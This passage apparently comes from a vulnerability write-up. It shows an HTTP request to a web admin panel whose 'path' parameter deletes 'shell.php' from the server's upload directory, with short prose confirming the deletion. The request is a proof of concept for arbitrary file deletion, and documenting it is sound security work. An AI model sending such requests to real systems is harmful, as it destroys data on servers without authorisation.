Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/asms/admin/?page=system\_info
Content-Length: 64
Cookie: \_\_utma=78021076.1353699714.1665838696.1665838696.1665838696.1; \_\_utmz=78021076.1665838696.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \_gauges\_unique\_month=1; \_gauges\_unique\_year=1; \_gauges\_unique=1; PHPSESSID=ocll92n082l6eedlf8jugi8i1r
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fasms%2Fuploads%2Fbanner%2Fshell.php

Here we delete the shel.php file in the directory

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the directory of the website

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

Tag

#firefox